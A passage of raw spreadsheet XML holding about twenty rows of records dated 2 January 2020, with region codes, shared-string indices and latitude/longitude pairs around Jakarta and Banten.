      <c r="V211" s="5" t="s">
        <v>14653</v>
      </c>
      <c r="W211" s="5">
        <v>-613695</v>
      </c>
      <c r="X211" t="s">
        <v>18463</v>
      </c>
      <c r="Y211" t="str">
        <f t="shared" si="3"/>
        <v>-6.13695,106.77983</v>
      </c>
    </row>
    <row r="212" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A212">
        <v>99414</v>
      </c>
      <c r="B212" s="1">
        <v>43832</v>
      </c>
      <c r="C212" s="2">
        <v>7.7476851851851852E-2</v>
      </c>
      <c r="D212" t="s">
        <v>22</v>
      </c>
      <c r="E212" t="s">
        <v>23</v>
      </c>
      <c r="F212" t="s">
        <v>1030</v>
      </c>
      <c r="G212" t="s">
        <v>1031</v>
      </c>
      <c r="H212" t="s">
        <v>26</v>
      </c>
      <c r="I212" t="s">
        <v>628</v>
      </c>
      <c r="J212" t="s">
        <v>863</v>
      </c>
      <c r="L212" t="s">
        <v>1032</v>
      </c>
      <c r="M212">
        <v>3175010003</v>
      </c>
      <c r="N212">
        <v>3175010</v>
      </c>
      <c r="O212">
        <v>3175</v>
      </c>
      <c r="P212">
        <v>31</v>
      </c>
      <c r="Q212" t="s">
        <v>545</v>
      </c>
      <c r="R212" t="s">
        <v>546</v>
      </c>
      <c r="S212" t="s">
        <v>547</v>
      </c>
      <c r="T212" t="s">
        <v>33</v>
      </c>
      <c r="U212" s="5">
        <v>10678224</v>
      </c>
      <c r="V212" s="5" t="s">
        <v>14654</v>
      </c>
      <c r="W212" s="5">
        <v>-613790</v>
      </c>
      <c r="X212" t="s">
        <v>18464</v>
      </c>
      <c r="Y212" t="str">
        <f t="shared" si="3"/>
        <v>-6.13790,106.78224</v>
      </c>
    </row>
    <row r="213" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A213">
        <v>99505</v>
      </c>
      <c r="B213" s="1">
        <v>43832</v>
      </c>
      <c r="C213" s="2">
        <v>9.6504629629629635E-2</v>
      </c>
      <c r="D213" t="s">
        <v>22</v>
      </c>
      <c r="E213" t="s">
        <v>23</v>
      </c>
      <c r="F213" t="s">
        <v>1033</v>
      </c>
      <c r="H213" t="s">
        <v>26</v>
      </c>
      <c r="I213" t="s">
        <v>1034</v>
      </c>
      <c r="J213" t="s">
        <v>1035</v>
      </c>
      <c r="L213" t="s">
        <v>1036</v>
      </c>
      <c r="M213">
        <v>3175050001</v>
      </c>
      <c r="N213">
        <v>3175050</v>
      </c>
      <c r="O213">
        <v>3175</v>
      </c>
      <c r="P213">
        <v>31</v>
      </c>
      <c r="Q213" t="s">
        <v>1037</v>
      </c>
      <c r="R213" t="s">
        <v>1013</v>
      </c>
      <c r="S213" t="s">
        <v>547</v>
      </c>
      <c r="T213" t="s">
        <v>33</v>
      </c>
      <c r="U213" s="5">
        <v>10689499</v>
      </c>
      <c r="V213" s="5" t="s">
        <v>14655</v>
      </c>
      <c r="W213" s="5">
        <v>-615457</v>
      </c>
      <c r="X213" t="s">
        <v>18465</v>
      </c>
      <c r="Y213" t="str">
        <f t="shared" si="3"/>
        <v>-6.15457,106.89499</v>
      </c>
    </row>
    <row r="214" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A214">
        <v>99547</v>
      </c>
      <c r="B214" s="1">
        <v>43832</v>
      </c>
      <c r="C214" s="2">
        <v>0.11197916666666667</v>
      </c>
      <c r="D214" t="s">
        <v>22</v>
      </c>
      <c r="E214" t="s">
        <v>23</v>
      </c>
      <c r="F214" t="s">
        <v>1038</v>
      </c>
      <c r="G214" t="s">
        <v>1039</v>
      </c>
      <c r="H214" t="s">
        <v>26</v>
      </c>
      <c r="I214" t="s">
        <v>1040</v>
      </c>
      <c r="J214" t="s">
        <v>37</v>
      </c>
      <c r="L214" t="s">
        <v>1041</v>
      </c>
      <c r="M214">
        <v>3674050006</v>
      </c>
      <c r="N214">
        <v>3674050</v>
      </c>
      <c r="O214">
        <v>3674</v>
      </c>
      <c r="P214">
        <v>36</v>
      </c>
      <c r="Q214" t="s">
        <v>1042</v>
      </c>
      <c r="R214" t="s">
        <v>1043</v>
      </c>
      <c r="S214" t="s">
        <v>170</v>
      </c>
      <c r="T214" t="s">
        <v>171</v>
      </c>
      <c r="U214" s="5">
        <v>10673433</v>
      </c>
      <c r="V214" s="5" t="s">
        <v>14656</v>
      </c>
      <c r="W214" s="5">
        <v>-629091</v>
      </c>
      <c r="X214" t="s">
        <v>18466</v>
      </c>
      <c r="Y214" t="str">
        <f t="shared" si="3"/>
        <v>-6.29091,106.73433</v>
      </c>
    </row>
    <row r="215" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A215">
        <v>99548</v>
      </c>
      <c r="B215" s="1">
        <v>43832</v>
      </c>
      <c r="C215" s="2">
        <v>0.11840277777777779</v>
      </c>
      <c r="D215" t="s">
        <v>22</v>
      </c>
      <c r="E215" t="s">
        <v>23</v>
      </c>
      <c r="F215" t="s">
        <v>1044</v>
      </c>
      <c r="G215" t="s">
        <v>1045</v>
      </c>
      <c r="H215" t="s">
        <v>26</v>
      </c>
      <c r="I215" t="s">
        <v>1046</v>
      </c>
      <c r="J215" t="s">
        <v>1047</v>
      </c>
      <c r="L215" t="s">
        <v>1048</v>
      </c>
      <c r="M215">
        <v>3174070001</v>
      </c>
      <c r="N215">
        <v>3174070</v>
      </c>
      <c r="O215">
        <v>3174</v>
      </c>
      <c r="P215">
        <v>31</v>
      </c>
      <c r="Q215" t="s">
        <v>83</v>
      </c>
      <c r="R215" t="s">
        <v>84</v>
      </c>
      <c r="S215" t="s">
        <v>32</v>
      </c>
      <c r="T215" t="s">
        <v>33</v>
      </c>
      <c r="U215" s="5">
        <v>10672476</v>
      </c>
      <c r="V215" s="5" t="s">
        <v>14657</v>
      </c>
      <c r="W215" s="5">
        <v>-616385</v>
      </c>
      <c r="X215" t="s">
        <v>18467</v>
      </c>
      <c r="Y215" t="str">
        <f t="shared" si="3"/>
        <v>-6.16385,106.72476</v>
      </c>
    </row>
    <row r="216" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A216">
        <v>99549</v>
      </c>
      <c r="B216" s="1">
        <v>43832</v>
      </c>
      <c r="C216" s="2">
        <v>0.12011574074074073</v>
      </c>
      <c r="D216" t="s">
        <v>22</v>
      </c>
      <c r="E216" t="s">
        <v>23</v>
      </c>
      <c r="F216" t="s">
        <v>1049</v>
      </c>
      <c r="G216" t="s">
        <v>1050</v>
      </c>
      <c r="H216" t="s">
        <v>26</v>
      </c>
      <c r="I216" t="s">
        <v>1051</v>
      </c>
      <c r="J216" t="s">
        <v>930</v>
      </c>
      <c r="L216" t="s">
        <v>1052</v>
      </c>
      <c r="M216">
        <v>3174070002</v>
      </c>
      <c r="N216">
        <v>3174070</v>
      </c>
      <c r="O216">
        <v>3174</v>
      </c>
      <c r="P216">
        <v>31</v>
      </c>
      <c r="Q216" t="s">
        <v>621</v>
      </c>
      <c r="R216" t="s">
        <v>84</v>
      </c>
      <c r="S216" t="s">
        <v>32</v>
      </c>
      <c r="T216" t="s">
        <v>33</v>
      </c>
      <c r="U216" s="5">
        <v>10672779</v>
      </c>
      <c r="V216" s="5" t="s">
        <v>14658</v>
      </c>
      <c r="W216" s="5">
        <v>-616746</v>
      </c>
      <c r="X216" t="s">
        <v>18468</v>
      </c>
      <c r="Y216" t="str">
        <f t="shared" si="3"/>
        <v>-6.16746,106.72779</v>
      </c>
    </row>
    <row r="217" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A217">
        <v>99550</v>
      </c>
      <c r="B217" s="1">
        <v>43832</v>
      </c>
      <c r="C217" s="2">
        <v>0.12116898148148147</v>
      </c>
      <c r="D217" t="s">
        <v>22</v>
      </c>
      <c r="E217" t="s">
        <v>23</v>
      </c>
      <c r="F217" t="s">
        <v>1053</v>
      </c>
      <c r="G217" t="s">
        <v>1054</v>
      </c>
      <c r="H217" t="s">
        <v>26</v>
      </c>
      <c r="I217" t="s">
        <v>1055</v>
      </c>
      <c r="J217" t="s">
        <v>1047</v>
      </c>
      <c r="L217" t="s">
        <v>1056</v>
      </c>
      <c r="M217">
        <v>3174070001</v>
      </c>
      <c r="N217">
        <v>3174070</v>
      </c>
      <c r="O217">
        <v>3174</v>
      </c>
      <c r="P217">
        <v>31</v>
      </c>
      <c r="Q217" t="s">
        <v>83</v>
      </c>
      <c r="R217" t="s">
        <v>84</v>
      </c>
      <c r="S217" t="s">
        <v>32</v>
      </c>
      <c r="T217" t="s">
        <v>33</v>
      </c>
      <c r="U217" s="5">
        <v>10672716</v>
      </c>
      <c r="V217" s="5" t="s">
        <v>14659</v>
      </c>
      <c r="W217" s="5">
        <v>-616626</v>
      </c>
      <c r="X217" t="s">
        <v>18469</v>
      </c>
      <c r="Y217" t="str">
        <f t="shared" si="3"/>
        <v>-6.16626,106.72716</v>
      </c>
    </row>
    <row r="218" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A218">
        <v>99551</v>
      </c>
      <c r="B218" s="1">
        <v>43832</v>
      </c>
      <c r="C218" s="2">
        <v>0.11847222222222221</v>
      </c>
      <c r="D218" t="s">
        <v>85</v>
      </c>
      <c r="E218" t="s">
        <v>23</v>
      </c>
      <c r="F218" t="s">
        <v>1057</v>
      </c>
      <c r="G218" t="s">
        <v>1058</v>
      </c>
      <c r="H218" t="s">
        <v>26</v>
      </c>
      <c r="I218" t="s">
        <v>1059</v>
      </c>
      <c r="J218" t="s">
        <v>306</v>
      </c>
      <c r="K218" t="s">
        <v>1060</v>
      </c>
      <c r="L218" t="s">
        <v>1061</v>
      </c>
      <c r="M218">
        <v>3172060001</v>
      </c>
      <c r="N218">
        <v>3172060</v>
      </c>
      <c r="O218">
        <v>3172</v>
      </c>
      <c r="P218">
        <v>31</v>
      </c>
      <c r="Q218" t="s">
        <v>309</v>
      </c>
      <c r="R218" t="s">
        <v>48</v>
      </c>
      <c r="S218" t="s">
        <v>49</v>
      </c>
      <c r="T218" t="s">
        <v>33</v>
      </c>
      <c r="U218" s="5">
        <v>10686756</v>
      </c>
      <c r="V218" s="5" t="s">
        <v>14660</v>
      </c>
      <c r="W218" s="5">
        <v>-623843</v>
      </c>
      <c r="X218" t="s">
        <v>18470</v>
      </c>
      <c r="Y218" t="str">
        <f t="shared" si="3"/>
        <v>-6.23843,106.86756</v>
      </c>
    </row>
    <row r="219" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A219">
        <v>99560</v>
      </c>
      <c r="B219" s="1">
        <v>43832</v>
      </c>
      <c r="C219" s="2">
        <v>0.11922453703703705</v>
      </c>
      <c r="D219" t="s">
        <v>85</v>
      </c>
      <c r="E219" t="s">
        <v>23</v>
      </c>
      <c r="F219" t="s">
        <v>1062</v>
      </c>
      <c r="G219" t="s">
        <v>1063</v>
      </c>
      <c r="H219" t="s">
        <v>26</v>
      </c>
      <c r="J219" t="s">
        <v>306</v>
      </c>
      <c r="K219" t="s">
        <v>1064</v>
      </c>
      <c r="L219" t="s">
        <v>1065</v>
      </c>
      <c r="M219">
        <v>3172060001</v>
      </c>
      <c r="N219">
        <v>3172060</v>
      </c>
      <c r="O219">
        <v>3172</v>
      </c>
      <c r="P219">
        <v>31</v>
      </c>
      <c r="Q219" t="s">
        <v>309</v>
      </c>
      <c r="R219" t="s">
        <v>48</v>
      </c>
      <c r="S219" t="s">
        <v>49</v>
      </c>
      <c r="T219" t="s">
        <v>33</v>
      </c>
      <c r="U219" s="5">
        <v>10686756</v>
      </c>
      <c r="V219" s="5" t="s">
        <v>14660</v>
      </c>
      <c r="W219" s="5">
        <v>-623843</v>
      </c>
      <c r="X219" t="s">
        <v>18470</v>
      </c>
      <c r="Y219" t="str">
        <f t="shared" si="3"/>
        <v>-6.23843,106.86756</v>
      </c>
    </row>
    <row r="220" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A220">
        <v>99593</v>
      </c>
      <c r="B220" s="1">
        <v>43832</v>
      </c>
      <c r="C220" s="2">
        <v>0.13467592592592592</v>
      </c>
      <c r="D220" t="s">
        <v>22</v>
      </c>
      <c r="E220" t="s">
        <v>23</v>
      </c>
      <c r="F220" t="s">
        <v>1066</v>
      </c>
      <c r="G220" t="s">
        <v>1067</v>
      </c>
      <c r="H220" t="s">
        <v>26</v>
      </c>
      <c r="I220" t="s">
        <v>1034</v>
      </c>
      <c r="J220" t="s">
        <v>728</v>
      </c>
      <c r="L220" t="s">
        <v>1068</v>
      </c>
      <c r="M220">
        <v>3174040001</v>
      </c>
      <c r="N220">
        <v>3174040</v>
      </c>
      <c r="O220">
        <v>3174</v>
      </c>
      <c r="P220">
        <v>31</v>
      </c>
      <c r="Q220" t="s">
        <v>730</v>
      </c>
      <c r="R220" t="s">
        <v>377</v>
      </c>
      <c r="S220" t="s">
        <v>32</v>
      </c>
      <c r="T220" t="s">
        <v>33</v>
      </c>
      <c r="U220" s="5">
        <v>10678035</v>
      </c>
      <c r="V220" s="5" t="s">
        <v>14661</v>
      </c>
      <c r="W220" s="5">
        <v>-617291</v>
      </c>
      <c r="X220" t="s">
        <v>18471</v>
      </c>
      <c r="Y220" t="str">
        <f t="shared" si="3"/>
        <v>-6.17291,106.78035</v>
      </c>
    </row>
    <row r="221" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A221">
        <v>99614</v>
      </c>
      <c r="B221" s="1">
        <v>43832</v>
      </c>
      <c r="C221" s="2">
        <v>0.13827546296296298</v>
      </c>
      <c r="D221" t="s">
        <v>22</v>
      </c>
      <c r="E221" t="s">
        <v>23</v>
      </c>
      <c r="F221" t="s">
        <v>1069</v>
      </c>
      <c r="G221" t="s">
        <v>1070</v>
      </c>
      <c r="H221" t="s">
        <v>26</v>
      </c>
      <c r="I221" t="s">
        <v>1071</v>
      </c>
      <c r="J221" t="s">
        <v>1072</v>
      </c>
      <c r="L221" t="s">
        <v>1073</v>
      </c>
      <c r="M221">
        <v>3171090004</v>
      </c>
      <c r="N221">
        <v>3171090</v>
      </c>
      <c r="O221">
        <v>3171</v>
      </c>
      <c r="P221">
        <v>31</v>
      </c>
      <c r="Q221" t="s">
        <v>1074</v>
      </c>
      <c r="R221" t="s">
        <v>347</v>
      </c>
      <c r="S221" t="s">
        <v>108</v>
      </c>
      <c r="T221" t="s">
        <v>33</v>
      </c>
      <c r="U221" s="5">
        <v>10686515</v>
      </c>
      <c r="V221" s="5" t="s">
        <v>14662</v>
      </c>
      <c r="W221" s="5">
        <v>-623472</v>
      </c>
      <c r="X221" t="s">
        <v>18472</v>
      </c>
      <c r="Y221" t="str">
        <f t="shared" si="3"/>
        <v>-6.23472,106.86515</v>
      </c>
    </row>
    <row r="222" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A222">
        <v>99643</v>
      </c>
      <c r="B222" s="1">
        <v>43832</v>
      </c>
      <c r="C222" s="2">
        <v>0.14366898148148147</v>
      </c>
      <c r="D222" t="s">
        <v>22</v>
      </c>
      <c r="E222" t="s">
        <v>23</v>
      </c>
      <c r="F222" t="s">
        <v>1075</v>
      </c>
      <c r="G222" t="s">
        <v>1076</v>
      </c>
      <c r="H222" t="s">
        <v>26</v>
      </c>
      <c r="I222" t="s">
        <v>131</v>
      </c>
      <c r="J222" t="s">
        <v>723</v>
      </c>
      <c r="L222" t="s">
        <v>1077</v>
      </c>
      <c r="M222">
        <v>3174070002</v>
      </c>
      <c r="N222">
        <v>3174070</v>
      </c>
      <c r="O222">
        <v>3174</v>
      </c>
      <c r="P222">
        <v>31</v>
      </c>
      <c r="Q222" t="s">
        <v>621</v>
      </c>
      <c r="R222" t="s">
        <v>84</v>
      </c>
      <c r="S222" t="s">
        <v>32</v>
      </c>
      <c r="T222" t="s">
        <v>33</v>
      </c>
      <c r="U222" s="5">
        <v>10674623</v>
      </c>
      <c r="V222" s="5" t="s">
        <v>14663</v>
      </c>
      <c r="W222" s="5">
        <v>-616435</v>
      </c>
      <c r="X222" t="s">
        <v>18473</v>
      </c>
      <c r="Y222" t="str">
        <f t="shared" si="3"/>
        <v>-6.16435,106.74623</v>
      </c>
    </row>
    <row r="223" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A223">
        <v>99648</v>
      </c>
      <c r="B223" s="1">
        <v>43832</v>
      </c>
      <c r="C223" s="2">
        <v>0.14453703703703705</v>
      </c>
      <c r="D223" t="s">
        <v>22</v>
      </c>
      <c r="E223" t="s">
        <v>23</v>
      </c>
      <c r="F223" t="s">
        <v>1078</v>
      </c>
      <c r="G223" t="s">
        <v>1079</v>
      </c>
      <c r="H223" t="s">
        <v>26</v>
      </c>
      <c r="I223" t="s">
        <v>1080</v>
      </c>
      <c r="J223" t="s">
        <v>448</v>
      </c>
      <c r="L223" t="s">
        <v>250</v>
      </c>
      <c r="M223">
        <v>3173070001</v>
      </c>
      <c r="N223">
        <v>3173070</v>
      </c>
      <c r="O223">
        <v>3173</v>
      </c>
      <c r="P223">
        <v>31</v>
      </c>
      <c r="Q223" t="s">
        <v>322</v>
      </c>
      <c r="R223" t="s">
        <v>323</v>
      </c>
      <c r="S223" t="s">
        <v>62</v>
      </c>
      <c r="T223" t="s">
        <v>33</v>
      </c>
      <c r="U223" s="5">
        <v>10683635</v>
      </c>
      <c r="V223" s="5" t="s">
        <v>14664</v>
      </c>
      <c r="W223" s="5">
        <v>-616189</v>
      </c>
      <c r="X223" t="s">
        <v>18474</v>
      </c>
      <c r="Y223" t="str">
        <f t="shared" si="3"/>
        <v>-6.16189,106.83635</v>
      </c>
    </row>
    <row r="224" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A224">
        <v>99685</v>
      </c>
      <c r="B224" s="1">
        <v>43832</v>
      </c>
      <c r="C224" s="2">
        <v>0.15005787037037036</v>
      </c>
      <c r="D224" t="s">
        <v>22</v>
      </c>
      <c r="E224" t="s">
        <v>23</v>
      </c>
      <c r="F224" t="s">
        <v>1081</v>
      </c>
      <c r="G224" t="s">
        <v>1082</v>
      </c>
      <c r="H224" t="s">
        <v>26</v>
      </c>
      <c r="I224" t="s">
        <v>784</v>
      </c>
      <c r="J224" t="s">
        <v>586</v>
      </c>
      <c r="L224" t="s">
        <v>1083</v>
      </c>
      <c r="M224">
        <v>3173050002</v>
      </c>
      <c r="N224">
        <v>3173050</v>
      </c>
      <c r="O224">
        <v>3173</v>
      </c>
      <c r="P224">
        <v>31</v>
      </c>
      <c r="Q224" t="s">
        <v>588</v>
      </c>
      <c r="R224" t="s">
        <v>589</v>
      </c>
      <c r="S224" t="s">
        <v>62</v>
      </c>
      <c r="T224" t="s">
        <v>33</v>
      </c>
      <c r="U224" s="5">
        <v>10686539</v>
      </c>
      <c r="V224" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W224" s="5">
        <v>-617469</v>
      </c>
      <c r="X224" t="s">
        <v>18368</v>
      </c>
      <c r="Y224" t="str">
        <f t="shared" si="3"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="225" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A225">
        <v>99692</v>
      </c>
      <c r="B225" s="1">
        <v>43832</v>
      </c>
      <c r="C225" s="2">
        <v>0.15059027777777778</v>
      </c>
      <c r="D225" t="s">
        <v>22</v>
      </c>
      <c r="E225" t="s">
        <v>23</v>
      </c>
      <c r="F225" t="s">
        <v>1084</v>
      </c>
      <c r="G225" t="s">
        <v>1085</v>
      </c>
      <c r="H225" t="s">
        <v>26</v>
      </c>
      <c r="I225" t="s">
        <v>517</v>
      </c>
      <c r="J225" t="s">
        <v>138</v>
      </c>
      <c r="L225" t="s">
        <v>1086</v>
      </c>
      <c r="M225">
        <v>3172080005</v>
      </c>
      <c r="N225">
        <v>3172080</v>
      </c>
      <c r="O225">
        <v>3172</v>
      </c>
      <c r="P225">
        <v>31</v>
      </c>
      <c r="Q225" t="s">
        <v>140</v>
      </c>
      <c r="R225" t="s">
        <v>141</v>
      </c>
      <c r="S225" t="s">
        <v>49</v>
      </c>
      <c r="T225" t="s">
        <v>33</v>
      </c>
      <c r="U225" s="5">
        <v>10695301</v>
      </c>
      <c r="V225" s="5" t="s">
        <v>14665</v>
      </c>
      <c r="W225" s="5">
        <v>-617457</v>
      </c>
      <c r="X225" t="s">
        <v>18475</v>
      </c>
      <c r="Y225" t="str">
        <f t="shared" si="3"/>
        <v>-6.17457,106.95301</v>
      </c>
    </row>
    <row r="226" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A226">
        <v>99711</v>
      </c>
      <c r="B226" s="1">
        <v>43832</v>
      </c>
      <c r="C226" s="2">
        <v>0.15410879629629629</v>
      </c>
      <c r="D226" t="s">
        <v>22</v>
      </c>
      <c r="E226" t="s">
        <v>23</v>
      </c>
      <c r="F226" t="s">
        <v>1087</v>
      </c>
      <c r="G226" t="s">
        <v>1088</v>
      </c>
      <c r="H226" t="s">
        <v>26</v>
      </c>
      <c r="I226" t="s">
        <v>65</v>
      </c>
      <c r="J226" t="s">
        <v>671</v>
      </c>
      <c r="L226" t="s">
        <v>250</v>
      </c>
      <c r="M226">
        <v>3174020004</v>
      </c>
      <c r="N226">
        <v>3174020</v>
      </c>
      <c r="O226">
        <v>3174</v>
      </c>
      <c r="P226">
        <v>31</v>
      </c>
      <c r="Q226" t="s">
        <v>31</v>
      </c>
      <c r="R226" t="s">
        <v>31</v>
      </c>
      <c r="S226" t="s">
        <v>32</v>
      </c>
      <c r="T226" t="s">
        <v>33</v>
      </c>
      <c r="U226" s="5">
        <v>10676366</v>
      </c>
      <c r="V226" s="5" t="s">
        <v>14666</v>
      </c>
      <c r="W226" s="5">
        <v>-619044</v>
      </c>
      <c r="X226" t="s">
        <v>18476</v>
      </c>
      <c r="Y226" t="str">
        <f t="shared" si="3"/>
        <v>-6.19044,106.76366</v>
      </c>
    </row>
    <row r="227" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A227">
        <v>99712</v>
      </c>
      <c r="B227" s="1">
        <v>43832</v>
      </c>
      <c r="C227" s="2">
        <v>0.15460648148148148</v>
      </c>
      <c r="D227" t="s">
        <v>22</v>
      </c>
      <c r="E227" t="s">
        <v>23</v>
      </c>
      <c r="F227" t="s">
        <v>1089</v>
      </c>
      <c r="H227" t="s">
        <v>26</v>
      </c>
      <c r="I227" t="s">
        <v>1090</v>
      </c>
      <c r="J227" t="s">
        <v>37</v>
      </c>
      <c r="L227" t="s">
        <v>1091</v>
      </c>
      <c r="M227">
        <v>3671020016</v>
      </c>
      <c r="N227">
        <v>3671020</v>
      </c>
      <c r="O227">
        <v>3671</v>
      </c>
      <c r="P227">
        <v>36</v>
      </c>
      <c r="Q227" t="s">
        <v>823</v>
      </c>
      <c r="R227" t="s">
        <v>274</v>
      </c>
      <c r="S227" t="s">
        <v>201</v>
      </c>
      <c r="T227" t="s">
        <v>171</v>
      </c>
      <c r="U227" s="5">
        <v>10671346</v>
      </c>
      <c r="V227" s="5" t="s">
        <v>14667</v>
      </c>
      <c r="W227" s="5">
        <v>-618646</v>
      </c>
      <c r="X227" t="s">
        <v>18477</v>
      </c>
      <c r="Y227" t="str">
        <f t="shared" si="3"/>
        <v>-6.18646,106.71346</v>
      </c>
    </row>
    <row r="228" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A228">
        <v>99723</v>
      </c>
      <c r="B228" s="1">
        <v>43832</v>
      </c>
      <c r="C228" s="2">
        <v>0.15824074074074074</v>
      </c>
      <c r="D228" t="s">
        <v>22</v>
      </c>
      <c r="E228" t="s">
        <v>23</v>
      </c>
      <c r="F228" t="s">
        <v>1092</v>
      </c>
      <c r="H228" t="s">
        <v>26</v>
      </c>
      <c r="I228" t="s">
        <v>1093</v>
      </c>
      <c r="J228" t="s">
        <v>1094</v>
      </c>
      <c r="L228" t="s">
        <v>1095</v>
      </c>
      <c r="M228">
        <v>3172060008</v>
      </c>
      <c r="N228">
        <v>3172060</v>
      </c>
      <c r="O228">
        <v>3172</v>
      </c>
      <c r="P228">
        <v>31</v>
      </c>
      <c r="Q228" t="s">
        <v>1096</v>
      </c>
      <c r="R228" t="s">
        <v>48</v>
      </c>
      <c r="S228" t="s">
        <v>49</v>
      </c>
      <c r="T228" t="s">
        <v>33</v>
      </c>
      <c r="U228" s="5">
        <v>10686343</v>
      </c>
      <c r="V228" s="5" t="s">
        <v>14668</v>
      </c>
      <c r="W228" s="5">
        <v>-621733</v>
      </c>
      <c r="X228" t="s">
        <v>18478</v>
      </c>
      <c r="Y228" t="str">
        <f t="shared" si="3"/>
        <v>-6.21733,106.86343</v>
      </c>
    </row>
    <row r="229" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A229">
        <v>99730</v>
      </c>
      <c r="B229" s="1">
        <v>43832</v>
      </c>
      <c r="C229" s="2">
        <v>0.1585648148148148</v>
      </c>
      <c r="D229" t="s">
        <v>22</v>
      </c>
      <c r="E229" t="s">
        <v>23</v>
      </c>
      <c r="F229" t="s">
        <v>1097</v>
      </c>
      <c r="G229" t="s">
        <v>1098</v>
      </c>
      <c r="H229" t="s">
        <v>26</v>
      </c>
      <c r="I229" t="s">
        <v>1099</v>
      </c>
      <c r="J229" t="s">
        <v>1100</v>
      </c>
      <c r="L229" t="s">
        <v>1101</v>
      </c>
      <c r="M229">
        <v>3172090007</v>
      </c>
      <c r="N229">
        <v>3172090</v>
      </c>
      <c r="O229">
        <v>3172</v>
      </c>
      <c r="P229">
        <v>31</v>
      </c>
      <c r="Q229" t="s">
        <v>890</v>
      </c>
      <c r="R229" t="s">
        <v>890</v>
      </c>
      <c r="S229" t="s">
        <v>49</v>
      </c>
      <c r="T229" t="s">
        <v>33</v>
      </c>
      <c r="U229" s="5">
        <v>10689469</v>
      </c>
      <c r="V229" s="5" t="s">
        <v>14669</v>
      </c>
      <c r="W229" s="5">
        <v>-617768</v>
      </c>
      <c r="X229" t="s">
        <v>18479</v>
      </c>
      <c r="Y229" t="str">
        <f t="shared" si="3"/>
        <v>-6.17768,106.89469</v>
      </c>
    </row>
    <row r="230" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A230">
        <v>99733</v>
      </c>
      <c r="B230" s="1">
        <v>43832</v>
      </c>
      <c r="C230" s="2">
        <v>0.15946759259259261</v>
      </c>
      <c r="D230" t="s">
        <v>22</v>
      </c>
      <c r="E230" t="s">
        <v>23</v>
      </c>
      <c r="F230" t="s">
        <v>1102</v>
      </c>
      <c r="G230" t="s">
        <v>1103</v>
      </c>
      <c r="H230" t="s">
        <v>26</v>
      </c>
      <c r="I230" t="s">
        <v>1104</v>
      </c>
      <c r="J230" t="s">
        <v>894</v>
      </c>
      <c r="L230" t="s">
        <v>1105</v>
      </c>
      <c r="M230">
        <v>3174020005</v>
      </c>
      <c r="N230">
        <v>3174020</v>
      </c>
      <c r="O230">
        <v>3174</v>
      </c>
      <c r="P230">
        <v>31</v>
      </c>
      <c r="Q230" t="s">
        <v>30</v>
      </c>
      <c r="R230" t="s">
        <v>31</v>
      </c>
      <c r="S230" t="s">
        <v>32</v>
      </c>
      <c r="T230" t="s">
        <v>33</v>
      </c>
      <c r="U230" s="5">
        <v>10677346</v>
      </c>
      <c r="V230" s="5" t="s">
        <v>14670</v>
      </c>
      <c r="W230" s="5">
        <v>-616712</v>
      </c>
      <c r="X230" t="s">
        <v>18480</v>
      </c>
      <c r="Y230" t="str">
        <f t="shared" si="3"/>
        <v>-6.16712,106.77346</v>
      </c>
    </row>
    <row r="231" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A231">
        <v>99753</v>
      </c>
      <c r="B231" s="1">
        <v>43832</v>
      </c>
      <c r="C231" s="2">
        <v>0.16364583333333335</v>
      </c>
      <c r="D231" t="s">
        <v>22</v>
      </c>
      <c r="E231" t="s">
        <v>23</v>
      </c>
      <c r="F231" t="s">
        <v>1106</v>
      </c>
      <c r="H231" t="s">
        <v>26</v>
      </c>
      <c r="I231" t="s">
        <v>1107</v>
      </c>
      <c r="J231" t="s">
        <v>1108</v>
      </c>
      <c r="L231" t="s">
        <v>859</v>
      </c>
      <c r="M231">
        <v>3174020005</v>
      </c>
      <c r="N231">
        <v>3174020</v>
      </c>
      <c r="O231">
        <v>3174</v>
      </c>
      <c r="P231">
        <v>31</v>
      </c>
      <c r="Q231" t="s">
        <v>30</v>
      </c>
      <c r="R231" t="s">
        <v>31</v>
      </c>
      <c r="S231" t="s">
        <v>32</v>
      </c>
      <c r="T231" t="s">
        <v>33</v>
      </c>
      <c r="U231" s="5">
        <v>10677933</v>
      </c>
      <c r="V231" s="5" t="s">
        <v>14671</v>
      </c>
      <c r="W231" s="5">
        <v>-617892</v>
      </c>
      <c r="X231" t="s">
        <v>18481</v>
      </c>
      <c r="Y231" t="str">
        <f t="shared" si="3"/>
        <v>-6.17892,106.77933</v>
      </c>
    </row>
    <row r="232" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A232">
        <v>99759</v>
      </c>
      <c r="B232" s="1">
        <v>43832</v>
      </c>
      <c r="C232" s="2">
        <v>0.12817129629629628</v>
      </c>
      <c r="D232" t="s">
        <v>85</v>
      </c>
      <c r="E232" t="s">
        <v>23</v>
      </c>
      <c r="F232" t="s">
        <v>1109</v>
      </c>
      <c r="G232" t="s">
        <v>1110</v>
      </c>
      <c r="H232" t="s">
        <v>26</v>
      </c>
      <c r="J232" t="s">
        <v>306</v>
      </c>
      <c r="K232" t="s">
        <v>1111</v>
      </c>
      <c r="L232" t="s">
        <v>1112</v>
      </c>
      <c r="M232">
        <v>3172060001</v>
      </c>
      <c r="N232">
        <v>3172060</v>
      </c>
      <c r="O232">
        <v>3172</v>
      </c>
      <c r="P232">
        <v>31</v>
      </c>
      <c r="Q232" t="s">
        <v>309</v>
      </c>
      <c r="R232" t="s">
        <v>48</v>
      </c>
      <c r="S232" t="s">
        <v>49</v>
      </c>
      <c r="T232" t="s">
        <v>33</v>
      </c>
      <c r="U232" s="5">
        <v>10686730</v>
